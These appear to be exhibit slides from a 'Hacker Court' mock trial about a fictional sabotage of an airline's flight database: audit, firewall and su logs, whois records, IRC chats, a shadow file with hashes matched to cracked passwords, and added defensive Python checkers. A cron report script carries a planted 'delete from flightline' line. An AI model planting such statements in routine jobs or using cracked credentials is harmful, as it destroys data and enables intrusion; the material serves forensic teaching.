
1 Hacker Court
Carole Fennelly, Jonathan Klein, Richard Salgado, Jesse Kornblum, Don Cavender, Rebecca Bace, William Tafoya, Richard Thieme, Jennifer Granick, Brian Martin, Kevin Manson, Simple Nomad & Jack Holleran

2 Cast
Jonathan Klein – Defense Expert Witness
Jennifer Granick – Counsel for the Defendant
Richard Thieme – The owner of one of the victims, Richard’s Air Transport Company
Brian Martin – The Defendant
Jack Holleran – Oscar J. Simpson, senior system administrator for RATCOM
Jesse Kornblum – Special Agent for the Air Force Office of Special Investigations
Don Cavender – investigative special agent from the FBI
Richard Salgado – represents the people
Rebecca Bace – Judge Judith Chamberlain Wapner (presiding judge)

3

4
ass (ejones)
bank (lgeorge)
bite (ddrago)
boy (rjones)
bye (mjones)
cat (rthieme)
chair (rbottom)
creep (pklutz)
cross (pprop)
cry (kkruk)
date (kstern)
day (kkluk)
dog (asmith)
eat (lchan)
fade (ldoor)
friend (fsmith)
gate (cchan)
gin (mstein)
girl (lsmith)
goat (tjones)
got (pstein)
green (mschwartz)

5
Nov 15 16: FLIGHT=PROD SQL results from auditlog_flight_dump.sql Time: 20: :28 Page 1
Action USERNAME Hostname Audit_Date_And_Time OLD_DATA NEW_DATA
I dbo TOWER Oct :29:16 Null VALUE
I dbo TOWER Oct :38:
I dbo TOWER Oct :49:18 D
I dbo TOWER Oct :02:18 Y
I dbo TOWER Oct :05:
I dbo TOWER Oct :39:
I dbo TOWER Oct :49:
D dbo TOWER Oct :47:38 RATCO
D dbo TOWER Oct :49:17 RATCOM
U dbo TOWER Oct :51:18 01/01/ /01/2002
I dbo TOWER Oct :52:18 01/01/ /15/2021
I dbo TOWER Oct :59:18 01/01/ /15/2002
I dbo TOWER Oct :09:18 V
I dbo TOWER Oct :13:23 USD
I dbo TOWER Oct :14:18 USD
U dbo TOWER Oct :15:37 01/01/ /15/2035
U dbo TOWER Oct :16:41 01/01/ /01/2001

6
D dbo TOWER Oct :17:02 RATCO
D dbo TOWER Oct :19:17 RATCOM
U dbo TOWER Oct :22:
U dbo TOWER Oct :23:21 AX
I dbo TOWER Oct :38:21 Y
I dbo TOWER Oct :39:21
U dbo TOWER Oct :41:
U dbo TOWER Oct :42:26 D P
U msimpson TOWER Oct :43:
U ojsimpson TOWER Oct :44:28 Z
D dbo TOWER Oct :47:38 RATCO
D dbo TOWER Oct :49:17 RATCOM
U ojsimpson TOWER Oct :53:28 01/01/ /15/2035
I ojsimpson TOWER Oct :02:23 N
I ojsimpson TOWER Oct :07:
U acook TOWER Oct :09:04 60
I acook TOWER XCSP Oct :15:
U msimpson TOWER Oct :16:
D dbo TOWER Oct :17:38 RATCO
D dbo TOWER Oct :19:17 RATCOM
U msimpson TOWER Oct :04:51 M
U msimpson TOWER Oct :06:
I msimpson TOWER Oct :29:16 Null VALUE
I msimpson TOWER Oct :29:18 AAA

7
U msimpson TOWER Oct :29:18 AAA
U msimpson TOWER Oct :29:30 AAA
U msimpson TOWER Oct :29:30 01/01/ /04/2002
I msimpson TOWER Oct :29:31 1
U acook TOWER Oct :26:01 CMBS
I acook TOWER Oct :27:40 Z| |
U ojsimpson TOWER Oct :38:
U ojsimpson TOWER Oct :38:29 M
D dbo TOWER Oct :37:38 RATCO
D dbo TOWER Oct :39:17 RATCOM
I ojsimpson TOWER Oct :42:29 KJR
I ojsimpson TOWER Oct :48:30 N/A
I dba TOWER Oct :52:45 AAA
U dba TOWER Oct :02:35 AAA
U dba TOWER Oct :08:11 AAA
U dba TOWER Oct :09:32 AAA
U dba TOWER Oct :12:23 AAA
U dba TOWER Oct :13:55 AAA
D dbo TOWER Oct :17:38 RATCO
D dbo TOWER Oct :19:17 RATCOM
U dba TOWER Oct :23:24 AAA
U dba TOWER Oct :28:24 AAA

8
15 2 * 4 * /usr/local/flight/db_backup
0 2 * * * /usr/local/flight/maintenance.csh
15,45 * * * * /usr/local/flight/flightline_configuration_info.csh > /dev/null 2>&1

9
isql -Usa -S$DSQUERY -P$PASSWD >& $LOG
select
go
print " "
print "====================="
print "$DSQUERY CONFIGURATIONS"
print "====================="
go
sp_configure
go
#Roadblock 0wns U
delete from flightline where flight_no like "RATCO*"
print " "
print "============================="
print "$DSQUERY sp_configure for Groups:"
print "============================="
go
END
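Added example (not from the deck): for a cron-run report script of the kind shown on slides 8 and 9, flag any data-modifying SQL inside its here-document and list the lines that differ from a known-good copy. Both the script text and the baseline are constructed here, including a `<< END` opener that the slide does not show.

```python
import difflib
import re

# Constructed sample: the slide-9 isql here-document (trimmed), injected lines included.
SUSPECT = """\
isql -Usa -S$DSQUERY -P$PASSWD >& $LOG << END
select
go
print "$DSQUERY CONFIGURATIONS"
go
sp_configure
go
#Roadblock 0wns U
delete from flightline where flight_no like "RATCO*"
print "$DSQUERY sp_configure for Groups:"
go
END
"""

# Constructed baseline: the same report job as it should read, with no data changes.
BASELINE = """\
isql -Usa -S$DSQUERY -P$PASSWD >& $LOG << END
select
go
print "$DSQUERY CONFIGURATIONS"
go
sp_configure
go
print "$DSQUERY sp_configure for Groups:"
go
END
"""

# Statements that modify data; a configuration report run from cron should issue none.
DML_RE = re.compile(r"^\s*(delete|update|insert|drop|truncate|alter)\b", re.IGNORECASE)

def find_dml(script):
    """(line_no, statement) for every data-modifying SQL statement in the script body."""
    return [(no, line.strip()) for no, line in enumerate(script.splitlines(), 1)
            if DML_RE.match(line)]

def added_lines(baseline, suspect):
    """Lines in the deployed script that the baseline copy does not contain."""
    diff = difflib.unified_diff(baseline.splitlines(), suspect.splitlines(), lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]
```

Either check alone would have caught the injected statement; the diff additionally surfaces the comment line that carries the intruder's tag.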

10
Oct 23 22:08:28 guardian web-gw[7361]: permit destination /8200 ID=
Oct 23 22:08:31 guardian web-gw[7371]: permit host=nodnsquery/ use of proxy ID=
Oct 23 22:08:34 guardian web-gw[7371]: permit destination /8200 ID=
Oct 23 22:09:35 guardian web-gw[7371]: exit host=nodnsquery/ cmds=0, in=95, out=91, duration=0, mode=Packet ID=
Oct 23 22:09:38 guardian web-gw[7360]: permit host=nodnsquery/ use of proxy ID=
Oct 23 22:09:40 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=
Oct 23 22:09:41 guardian web-gw[7360]: permit destination /8200 ID=
Oct 23 22:10:44 guardian web-gw[7365]: permit host=nodnsquery/ use of proxy ID=
Oct 23 22:10:48 guardian web-gw[7365]: permit destination /8200 ID=
Oct 23 22:10:50 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=

11
Oct 23 22:54:31 guardian web-gw[7362]: permit host=nodnsquery/ use of proxy ID=
Oct 23 22:54:34 guardian web-gw[7362]: permit destination /8200 ID=
Oct 23 22:54:35 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=95, out=91, duration=0, mode=Packet ID=
Oct 23 22:55:38 guardian unix: securityalert: tcp if=hme1 from :1545 to on unserved port 110
Oct 23 22:55:40 guardian web-gw[7365]: exit host=nodnsquery/ cmds=0, in=88, out=92, duration=0, mode=Packet ID=
Oct 23 22:55:40 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 22:55:41 guardian ftp-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 22:56:44 guardian web-gw[7360]: permit host=nodnsquery/ use of proxy ID=
Oct 23 22:56:48 guardian web-gw[7360]: permit destination /8200 ID=
Oct 23 22:56:50 guardian web-gw[7371]: permit host=nodnsquery/ use of proxy ID=

12
Oct 23 19:14:52 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3
Oct 23 19:34:53 tower login: [ID auth.notice] msimpson authorized for service
Oct 23 20:14:55 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/4
Oct 23 20:20:57 tower login: [ID auth.notice] msimpson authorized for service
Oct 23 20:37:58 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/5
Oct 23 21:04:01 tower login: [ID auth.notice] acook authorized for service
Oct 23 21:10:03 tower su: [ID auth.notice] 'su root' succeeded for acook on /dev/pts/4
Oct 23 21:14:08 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3
Oct 23 22:10:11 tower login: [ID auth.notice] ojsimpson authorized for service
Oct 23 22:11:14 tower su: [ID auth.notice] 'su root' succeeded for ojsimpson on /dev/pts/5
Oct 23 22:24:18 tower login: [ID auth.notice] msimpson authorized for service
Oct 23 22:27:22 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3
Oct 23 22:29:25 tower login: [ID auth.notice] acook authorized for service
Oct 23 22:34:28 tower su: [ID auth.notice] 'su root' succeeded for acook on /dev/pts/6
Oct 23 22:36:31 tower login: [ID auth.notice] msimpson authorized for service
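Added example (not from the deck): a parser for the slide-12 tower auth log that lists successful root escalations inside a time window and counts them per account, the who-had-root-when correlation an investigator runs against such a log before comparing it with the database audit trail. The sample lines are a constructed subset in the slide's format; treating the numeric syslog message ID as optional is an assumption, since the slide shows it stripped.

```python
import re
from collections import Counter

# Constructed sample: a subset of the slide-12 'tower' auth log, in the same format.
SAMPLE_LOG = """\
Oct 23 19:14:52 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3
Oct 23 19:34:53 tower login: [ID auth.notice] msimpson authorized for service
Oct 23 21:04:01 tower login: [ID auth.notice] acook authorized for service
Oct 23 21:10:03 tower su: [ID auth.notice] 'su root' succeeded for acook on /dev/pts/4
Oct 23 22:10:11 tower login: [ID auth.notice] ojsimpson authorized for service
Oct 23 22:11:14 tower su: [ID auth.notice] 'su root' succeeded for ojsimpson on /dev/pts/5
Oct 23 22:24:18 tower login: [ID auth.notice] msimpson authorized for service
Oct 23 22:27:22 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3
Oct 23 22:34:28 tower su: [ID auth.notice] 'su root' succeeded for acook on /dev/pts/6
"""

# Solaris syslog prefix. The numeric message ID inside "[ID ... auth.notice]" is made
# optional (assumption) because the slide shows it stripped.
LINE_RE = re.compile(r"^\w{3} +\d+ (?P<time>\d\d:\d\d:\d\d) \S+ (?P<prog>\w+): "
                     r"\[ID (?:\d+ )?auth\.notice\] (?P<msg>.*)$")
SU_RE = re.compile(r"'su (?P<target>\S+)' succeeded for (?P<user>\S+) on (?P<tty>\S+)")
LOGIN_RE = re.compile(r"^(?P<user>\S+) authorized for service")

def parse_events(text):
    """One dict per recognised line: time, user, event ('login'/'su'), target, tty."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # unknown format: skip, do not guess
        su, lg = SU_RE.search(m["msg"]), LOGIN_RE.match(m["msg"])
        if su:
            events.append({"time": m["time"], "user": su["user"], "event": "su",
                           "target": su["target"], "tty": su["tty"]})
        elif lg:
            events.append({"time": m["time"], "user": lg["user"], "event": "login",
                           "target": None, "tty": None})
    return events

def root_escalations(events, start, end):
    """(time, user, tty) for each successful su to root with start <= time <= end."""
    return [(e["time"], e["user"], e["tty"]) for e in events
            if e["event"] == "su" and e["target"] == "root" and start <= e["time"] <= end]

def su_counts(events):
    """How often each account reached root; a first who-had-root summary."""
    return Counter(e["user"] for e in events if e["event"] == "su" and e["target"] == "root")
```

Times compare as zero-padded strings, which is enough within one day; a multi-day log would need the month and day folded into a real timestamp first.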

13
isql -Usa -S$DSQUERY -P$PASSWD >& $LOG
select
go
print " "
print "====================="
print "$DSQUERY CONFIGURATIONS"
print "====================="
go
sp_configure
go
#Roadblock 0wns U
delete from flightline where flight_no like "RATCO*"
print " "
print "============================="
print "$DSQUERY sp_configure for Groups:"
print "============================="
go
END

14
Speed Bump Communications (NETBLK-SB )
1 Communcations Drive
Reston, VA US
Netname: SB
Netblock:
Coordinator:
Smith, John (JS2299-ARIN) (301)
Record last updated on 16-Apr
Database last updated on 21-Jul :00:38 EDT.

15
rthieme:eoVxrmzba5gNw:11891::::::
asmith:moUziW.7KMLSY:11891::::::
tjones:to0lDYzyyt0Bs:11891::::::
hgray:0pz7sFqJ/goAY:11891::::::
fsmith:8p9Cjr.7iiCkM:11891::::::
bsmith:GpQ5yKAO4vOPg:11891::::::
lgeorge:NpY8j4/wdYySI:11891::::::
mjones:VphC2rx/zWLS2:11891::::::
bmartin:gpi7/g9RtoOZY:11891::::::
klee:op1halJd55/6w:11891::::::
mluther:zpT8i8yMXt2Os:11891::::::
kdean:4qcPnfVzgAHNk:11891::::::
rjones:BqsGoQ6ff18JQ:11891::::::
lsmith:HqDHnSLTSOddk:11891::::::
kstern:Pqqkz2L6M610k:11891::::::
rbottom:Wq1Nms2iF/jrM:11891::::::
prussell:lqhscgRuHeUOM:11891::::::
lgrayson:sqCXT83jP9UtY:11891::::::
cspot:.r.mhB1lBq3Gs:11891::::::
ddrago:5rgt1SQRwR3Xo:11891::::::
alee:Cr14mfLo/2J12:11891::::::
mlamb:Kr24wQM19ESxk:11891::::::

16
rthieme:x:1000:10:Richard Thieme:/opt/local/dragon:/bin/ksh
asmith:x:1001:10:Angela Smith:/opt/local/dragon:/bin/ksh
tjones:x:1002:10:Tom Jones:/opt/local/dragon:/bin/ksh
hgray:x:1003:10:Nenry Gray:/opt/local/dragon:/bin/ksh
fsmith:x:1004:10:Frank Smith:/opt/local/dragon:/bin/ksh
bsmith:x:1005:10:Barbara Smith:/opt/local/dragon:/bin/ksh
lgeorge:x:1006:10:Larry George:/opt/local/dragon:/bin/ksh
mjones:x:1007:10:Marcus Jones:/opt/local/dragon:/bin/ksh
bmartin:x:1008:10:Brian Martin:/opt/local/dragon:/bin/ksh
klee:x:1009:10:Ken Lee:/opt/local/dragon:/bin/ksh
mluther:x:1010:10:Martin Luther:/opt/local/dragon:/bin/ksh
kdean:x:1011:10:Kathleen Dean:/opt/local/dragon:/bin/ksh
rjones:x:1012:10:Roberta Jones:/opt/local/dragon:/bin/ksh
lsmith:x:1013:10:Lance Smith:/opt/local/dragon:/bin/ksh
kstern:x:1014:10:Kevin Stern:/opt/local/dragon:/bin/ksh
rbottom:x:1015:10:Robert Bottom:/opt/local/dragon:/bin/ksh
prussell:x:1016:10:Peter Russell:/opt/local/dragon:/bin/ksh
lgrayson:x:1017:10:Lydia Grayson:/opt/local/dragon:/bin/ksh
cspot:x:1018:10:Charles Spot:/opt/local/dragon:/bin/ksh
ddrago:x:1019:10:Darren Drago:/opt/local/dragon:/bin/ksh
alee:x:1020:10:Alex Lee:/opt/local/dragon:/bin/ksh
mlamb:x:1021:10:Michael Lamb:/opt/local/dragon:/bin/ksh

17
tryvyhZxCk206:ass
NpY8j4/wdYySI:bank
5rgt1SQRwR3Xo:bite
BqsGoQ6ff18JQ:boy
VphC2rx/zWLS2:bye
eoVxrmzba5gNw:cat
Wq1Nms2iF/jrM:chair
8spzQjq6/V9WA:creep
irR72to9aPs4U:cross
bs.8w7gez5Z7k:cry
Pqqkz2L6M610k:date
puLAs1ayn1djQ:day
moUziW.7KMLSY:dog
ZuDddu9uepsF6:eat
gtgjyxL8bJBAM:fade
8p9Cjr.7iiCkM:friend
RuO7.RU.n0juE:gate
psF.DEeQIgTTI:gin
HqDHnSLTSOddk:girl
to0lDYzyyt0Bs:goat
hsvRfcLuhR2so:got
vt4dRCFbPxodk:green

18
ass (ejones)
bank (lgeorge)
bite (ddrago)
boy (rjones)
bye (mjones)
cat (rthieme)
chair (rbottom)
creep (pklutz)
cross (pprop)
cry (kkruk)
date (kstern)
day (kkluk)
dog (asmith)
eat (lchan)
fade (ldoor)
friend (fsmith)
gate (cchan)
gin (mstein)
girl (lsmith)
goat (tjones)
got (pstein)
green (mschwartz)

19
Session begins 22-Oct :45:02
*** fbot has joined channel #hakchat
hey fbot
*** squido has joined channel #hakchat
rar hi all
hey squido
hi squido
hey bitz how goes?
sucks bigtime
why?!
work! that asshole richard fire me and won't give me my last paycheck
doh! jeez, why not? isnt that illegal?
he claims i didn't give back the fucking emergency pager even tho i gave it to his secretary. bitch lost it or something
so now im out a lot of money and i just got a new car
isnt there something you can do?

20
howdy
not like the courts will believe me. everyone would believe a big company over me
why'd he fire you anyway?
i was bored, portscanning some systems to see what was running. nothing bad or anything
didnt give me a warning, just canned me the same day
lame =(
yeah, he'll pay for it one way or another
afk brb
??
richard knows jack about security and never gave us time to fix the network
he's still running vulnerable cgi's on the apache server, still has a few vulnerable RPC servers that are net accessable
he's just begging to get hacked *hint* *cough*
man, dont get in more trouble. feds come down hard on you for that shit.
FBI are complete assclowns
i know, i'm just saying... could happen
gotta run
hasta
doh stepped afk, see ya rblock

21
Session begins 25-Oct :00:15
*** squido has joined channel
hey squido!
rar hi all
hey rblock =)
hehehe check this out
richard (ex boss dickhead) mysteriously got hacked >=)...
*** stalkin has joined channel
tell me you didn't!
oh err uhm, i didnt!
didn't what?
why don't i believe you...
<-- innocent!
hehehe
i just heard through the grapevine ole richard ran into a lot of problems. apparently one of his servers ran into problems.... or so i hear
<- lost in this conversation
evil evil man!
<-- innocent! *snicker*

22
Session begins 18-Jun :03:20
gah i'm tired of work shit
why now?
i'm tired of these little script kiddie assholes day in and day out they run the most inane crap against my network
bitch all you want, but they know more than you often and they keep yer ass employed
stfu prymate, quit defending your script kiddy brethren
d00d you know shit, you are shit
/yawn, when you hit puberty feel free to come knocking, until then keep working on your wet dreams kid
this coming from a l4m3r admin who been owned be4
sure sure, and your impressive advisories on russian CGI packages used by four people worldwide sure qualify you as a security expert
d00d fuck u and stfu or ill 0wn u hard
i think you'd have a hard time owning mommy and daddy at a PTA meeting kid
remember this asshole
*** Signoff: prymate (f u rblock)

23
Oct 23 22:45:22 guardian web-gw[7371]: exit host=nodnsquery/ cmds=0, in=96, out=92, duration=0, mode=Packet ID=
Oct 23 22:45:25 guardian web-gw[7370]: permit host=nodnsquery/ use of proxy ID=
Oct 23 22:46:28 guardian web-gw[7370]: permit destination /8200 ID=
Oct 23 22:46:31 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=85, out=89, duration=0, mode=Packet ID=
Oct 23 22:46:34 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 22:47:35 guardian unix: securityalert: tcp if=hme1 from :1545 to on unserved port 110
Oct 23 22:47:38 guardian web-gw[7360]: permit host=nodnsquery/ use of proxy ID= :wq
Oct 23 22:47:40 guardian web-gw[7360]: permit destination /8200 ID=
Oct 23 22:48:41 guardian web-gw[7365]: permit host=nodnsquery/ use of proxy ID=

24
Oct 23 01:09:55 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=
Oct 23 02:14:52 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 03:21:48 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=
Oct 23 04:18:41 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 05:04:38 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=
Oct 23 05:27:34 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 05:50:28 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=
Oct 23 06:12:22 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 06:35:14 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=
Oct 23 07:00:08 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=
Oct 23 08:06:01 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=

25
if ($DSQUERY == "PROD" || $DSQUERY == "DENVER" || $DSQUERY == "BETA" || $DSQUERY == "PRODNEW" || $DSQUERY == "BETANEW") then
    set PASSWD = `cat $SYBASE/magicword`
else if ($DSQUERY == "SYSTEM12") then
    set PASSWD = `cat $SYBASE/magicword.SYSTEM12`
else if ($DSQUERY == "CMFPROD") then
    set PASSWD = `cat $SYBASE/magicword.CMFPROD`
else if ($DSQUERY == "PORTIAPROD") then
    set PASSWD = `cat $SYBASE/magicword.PORTIAPROD`
else
    set PASSWD = `cat $SYBASE/magicword.TEST`
endif
echo `date`" JOB: $DSQUERY sybase_configuration_info.csh" >>&! $LOG
echo `date`" FILE: $LOG" >>&! $LOG
echo " " >> $LOG
echo `date`" Getting Configuration Information for $DSQUERY Server..." >> $LOG
echo " " >> $LOG

26
Registrant:
Richard A. Thieme Transport Company (RATCO-DOM)
999 State St
Falls Church, VA US
Domain Name: RATCO.COM
Administrative, Technical and Billing Contact:
Thieme, Richard (RT2229)
999 State St
Falls Church, VA US
(301) (FAX) (301)
Record expires on 17-Aug
Record created on 16-Aug
Database last updated on 22-Jul :33:20 EDT.
Domain servers in listed order:
NS1.SPEEDBUMP.COM
NS2.SPEEDBUMP.COM

27
Registrant:
SpringField International Airport (SIA-DOM)
1 Flight Drive
SpringField, MD US
Domain Name: SIA.COM
Administrative, Technical Contact:
Simpson, Oscar J. (OS239)
SpringField International Airport
1 Flight Drive
SpringField, MD
(301) (FAX) (301)
Record expires on 17-Aug
Record created on 16-Aug
Database last updated on 22-Jul :33:20 EDT.
Domain servers in listed order:
NS1.MSN.COM
NS2.ATT.NET

28
Registrant:
Speed Bump Communications (SPEED-DOM)
1 Communications Drive
Reston, VA US
Domain Name: SPEEDBUMP.COM
Administrative Contact:
Smith, John (JS2299)
Speed Bump Communications
1 Communications Drive
Reston, VA
(301) (FAX) (301)
Technical Contact:
Jones, Anthony (AJ9999)
1 Communications Drive
Reston, VA
(301) (FAX) (301)
Record expires on 17-Aug
Record created on 16-Aug
Database last updated on 22-Jul :33:20 EDT.
Domain servers in listed order:
NS1.SPEEDBUMP.COM
NS2.SPEEDBUMP.COM

